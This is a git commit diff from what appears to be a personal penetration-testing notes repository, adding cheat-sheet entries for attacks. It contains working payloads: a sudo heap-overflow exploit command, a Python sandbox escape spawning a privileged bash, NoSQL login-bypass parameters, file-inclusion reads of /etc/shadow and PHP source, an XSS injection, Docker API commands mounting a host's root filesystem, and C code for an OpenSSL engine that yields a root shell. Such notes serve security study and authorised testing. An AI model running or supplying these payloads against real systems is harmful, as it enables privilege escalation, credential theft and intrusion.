some more docker

2021-12-09 01:50:04 +01:00 · 2021-12-09 01:50:04 +01:00 · 512b365a34
parent cefc5b209a
commit 512b365a34
14 changed files with 167 additions and 10 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -88,3 +88,9 @@
 [submodule "post_exploitation/Invoke-EDRChecker"]
 	path = post_exploitation/Invoke-EDRChecker
 	url = https://github.com/PwnDexter/Invoke-EDRChecker.git
 [submodule "reverse_shells/phpreverseshell"]
 	path = reverse_shells/phpreverseshell
 	url = https://github.com/rootkral4/phpreverseshell.git
 [submodule "exploit/web/xxe/xxeserv"]
 	path = exploit/web/xxe/xxeserv
 	url = https://github.com/staaldraad/xxeserv.git
--- a/exploit/linux/sudo/baron_samedit.md
+++ b/exploit/linux/sudo/baron_samedit.md
@ -8,6 +8,7 @@
 ```sh
 sudoedit -s '\' $(python -c "print('\x41' * 10000)")
 ```
-
+* Defaults to try
-
+```sh
-
+./brute.sh 90 120 50 70 150 300
 ```
--- a/exploit/python/jail_escape.md
+++ b/exploit/python/jail_escape.md
@ -0,0 +1,18 @@
 # Escaping Jails
 * [Aneesh's blog](https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831)
 ## Usage
 * Circumvent via `__builtins__`
 ```python
 dir(__builtins__)
 ```
 ```python
 __builtins__.__dict__
 ```
 * Call builtins
 ```python
 __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash -p')
 ```
--- a/exploit/sqli/no_sqli.md
+++ b/exploit/sqli/no_sqli.md
@ -9,7 +9,26 @@
 * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
 * [Elasticsearch docs](https://www.elastic.co/guide/index.html)
 # Operators
 * Most common
 ```sql
 $and
 $or
 $eq
 $ne
 $gt
 $where
 $exists
 $regex
 ```
 ## Tips & Tricks
 * Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
    * 2D array via `user[$nin][]=foo`
 ## Example
 * POST or GET parameters
 ```sh
 username=admin&password[$ne]=admin
 ```
--- a/exploit/web/csrf.md
+++ b/exploit/web/csrf.md
@ -1 +1,11 @@
 # CSRF
 ## Protection
 * May be a hidden field with an encoded value
 ```html
    <input type="hidden" name="csrf_protect" value="eyJk..n0=">
 ```
 * This field need to be removed in order to do some csrf shenanigans
 * Decode the value to reproduce some valid content.
--- a/exploit/web/local_file_inclusion.md
+++ b/exploit/web/local_file_inclusion.md
@ -2,6 +2,14 @@
 To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
 * [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
 ## PHP Functions
 * Functions provoking an LFI
 ```php
 include()
 require()
 include_once ()
 require_once()
 ```
 ## Usage
@ -37,18 +45,15 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20..
 * [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2)
 *  Log poisoning and opening logfile via `/proc/self/fd/xx`.
 ### Base64 Encoding via PHP
 * Circumvent filter via encoding local files included ins a GET parameter value
 ```http
 curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
 ```
 ## Files of Interest
 * `/etc/issue`
 * `/etc/profile`
 * `/proc/version`
 * `/etc/passwd`
 * `/etc/shadow`
 * `/etc/group`
 * `/etc/motd`
 * `/etc/mysql/my.cnf`
 * `/root/.bash_history`
 * `/var/log/dmessage`
 * `/var/mail/root`
@ -56,10 +61,33 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<
 * `/var/log/apache2/access.log`
 * `C:\boot.ini`
 * `/proc/self/fd/xx`
 * `/proc/version`
 * `/proc/cmdline`
 * `/proc/[0-9]*/fd/[0-9]*`
 * `sess_<cookieValue>` if the location of the session file is known. Some paths are
 ```sh
 c:\Windows\Temp
 /tmp/
 /var/lib/php5
 /var/lib/php/session
 ```
 ### Base64 Encoding via PHP
 * Circumvent filter via encoding local files included ins a GET parameter value
 * __Read PHP files through encoding them, so they won't be executed__
 ```http
 curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=<fileOnServer>.php
 curl http://test.com/test.php?file=php://filter/read=string.rot13/resource=/etc/passwd
 ```
 * Use encoded data as input through the parameter
 ```sh
 curl http://test.com/test.php?file=data://text/plain;base64,dGhlIGFuc3dlciBpcyA0Mgo=
 ```
 ## Tricks
 * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4
 * Terminate query with `/.`
 * `..//..//..//file`, double slashes
-
+* URL encode path
--- a/exploit/web/xss.md
+++ b/exploit/web/xss.md
@ -124,6 +124,10 @@ document.onkeypress = function (e) {
 ## Tricks and Tips
 * Use Polyglots
 * [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
 * Close the a vulnerable, exploitable tag and open a script tag
 ```html
 </tag><script>alert(1);</script>
 ```
 ## Protection Methods
--- a/exploit/web/xxe/xxeserv
+++ b/exploit/web/xxe/xxeserv
@ -0,0 +1 @@
 Subproject commit 046c559a3c1a65d3a41a2fb706807b9e48e66563
--- a/hashes/password_cracking/john.md
+++ b/hashes/password_cracking/john.md
@ -35,3 +35,9 @@ $[0-9]$[0-9]
 ```sh
 john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
 ```
 ### Subformats
 * Some salted passwords need dynamic rules
 ```sh
 john --list=subformats
 ```
--- a/hashes/password_cracking/sucrack.md
+++ b/hashes/password_cracking/sucrack.md
@ -0,0 +1,8 @@
 # sucrack
 * [Repo](https://github.com/hemp3l/sucrack.git)
 * Upload to target and build
 ```sh
 sucrack -u <username> -w 100 <wordlist>
 ```
--- a/misc/level3_hypervisor/docker_sec/docker.md
+++ b/misc/level3_hypervisor/docker_sec/docker.md
@ -41,6 +41,7 @@ dive <IMAGE-ID>
    ```sh 
    docker -H tcp://test.com:2375 ps
    docker -H tcp://test.com:2375 exec <container> <cmd>
    docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
    ```
 * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
--- a/misc/openssl/openssl_engine.md
+++ b/misc/openssl/openssl_engine.md
@ -0,0 +1,44 @@
 # OpenSSL Engine
 * Hook external libs
 * [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
 * Most minimal example
 ```C
 #include <openssl/engine.h>
 static int bind(ENGINE *e, const char *id)
 {
  return 1;
 }
 IMPLEMENT_DYNAMIC_BIND_FN(bind)
 IMPLEMENT_DYNAMIC_CHECK_FN()
 ```
 * Shell as root
 ```C
 #include <openssl/engine.h>
 #include <unistd.h>
 static int bind(ENGINE *e, const char *id)
 {
  setuid(0);
  setgid(0);
  system("/bin/bash");
 }
 IMPLEMENT_DYNAMIC_BIND_FN(bind)
 IMPLEMENT_DYNAMIC_CHECK_FN()
 ```
 * Compile
 ```C
 gcc -fPIC -o rootshell.o -c rootshell.c
 gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
 ```
 * Execute via
 ```sh
 openssl engine -t `pwd`/rootshell.so
 ```
--- a/post_exploitation/docs/windows/powershell_logs.md
+++ b/post_exploitation/docs/windows/powershell_logs.md
@ -0,0 +1,10 @@
 # Powershell Logs
 ## Transcript Logs
 * Enable via
 ```sh
 reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0x1 /f
 reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f
 reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
 ```
--- a/reverse_shells/phpreverseshell
+++ b/reverse_shells/phpreverseshell
@ -0,0 +1 @@
 Subproject commit 72873b93fa3d960ce35f8c46d6fd8195a45f17c0
		`@ -0,0 +1 @@`
							`Subproject commit 046c559a3c1a65d3a41a2fb706807b9e48e66563`
		`@ -0,0 +1 @@`
							`Subproject commit 72873b93fa3d960ce35f8c46d6fd8195a45f17c0`